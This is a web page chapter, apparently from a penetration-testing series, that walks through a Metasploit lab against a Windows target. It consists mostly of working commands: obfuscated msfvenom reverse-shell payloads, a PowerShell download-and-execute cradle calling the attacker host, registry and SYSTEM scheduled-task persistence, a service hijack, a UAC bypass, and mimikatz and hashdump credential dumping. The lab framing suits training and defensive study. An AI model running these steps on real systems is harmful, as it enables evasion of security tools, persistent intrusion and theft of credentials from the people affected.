Skip to content

20. Metasploit Lab Environment

To implement these techniques in a lab environment, let's create a setup where we can safely test bypassing AV/EDR, fileless execution, persistence, and privilege escalation. Here’s a detailed plan:

Lab Environment Setup

1. Required Tools

  • Attacker Machine: Kali Linux or Parrot OS with Metasploit installed.
  • Target Machine: Windows 10 or Windows Server 2019.
    • Disable real-time protection to simulate bypassed AV/EDR initially.
    • Use a VM snapshot for safe restoration.

2. Network Configuration

  • Use an isolated NAT or Host-Only network in your hypervisor (VirtualBox, VMware).
  • Configure IPs:
    • Attacker: 192.168.1.10
    • Target: 192.168.1.20

Bypassing AV/EDR

Let’s create a stealthy reverse shell payload and execute it on the target.

Steps:

  1. Generate an Encoded Payload:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded_payload.exe

  2. Obfuscate Using PEzor:

    • Install and run:

      ./PEzor.sh encoded_payload.exe

    • Output: encoded_payload.exe_obfuscated.

    • Deliver the Payload:

    • Host it via HTTP:

      python3 -m http.server 8080

    • Download on the target:

      curl http://192.168.1.10:8080/encoded_payload.exe_obfuscated -o payload.exe

  3. Execute on the Target:

    payload.exe

  4. Set Up Listener on Attacker:

    msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit

Fileless Execution

Run the payload directly in memory.

Steps:

  1. Generate a PowerShell Payload:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f ps1 -o payload.ps1

  2. Host the Script:

    python3 -m http.server 8080

  3. Execute with PowerShell:

    IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.10:8080/payload.ps1')

Persistence

Use Meterpreter to maintain access.

Steps:

  1. Meterpreter Persistence Script:

    run persistence -U -i 10 -p 4444 -r 192.168.1.10

  2. Registry Key:

    • Create persistence manually:

      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Updater" /t REG_SZ /d "C:\path\to\payload.exe"

  3. Scheduled Task:

    schtasks /create /tn "Updater" /tr "C:\path\to\payload.exe" /sc onlogon /ru SYSTEM

Privilege Escalation

Use Metasploit or manual techniques.

Steps:

  1. Exploit Suggestion: Run the Local Exploit Suggester:

    use post/multi/recon/local_exploit_suggester
set SESSION 1
run

  2. Exploit Services: If a service has weak permissions:

    sc config <service-name> binPath= "C:\path\to\payload.exe"
sc start <service-name>

  3. Bypass UAC:

    use exploit/windows/local/bypassuac
set SESSION 1
run

Testing Workflow

1. Deploy the Payload

Choose a method:

  • Dropper (encoded EXE).
  • Fileless (PowerShell loader).

2. Monitor Results

  • On the attacker machine:

    sessions -i 1

    • Dump credentials:

      run post/windows/gather/credentials/mimikatz

    • Dump password hashes:

      hashdump

3. Validate Persistence

  • Reboot the target and verify Meterpreter reconnects.

4. Escalate Privileges

Use suggested exploits or weak service permissions.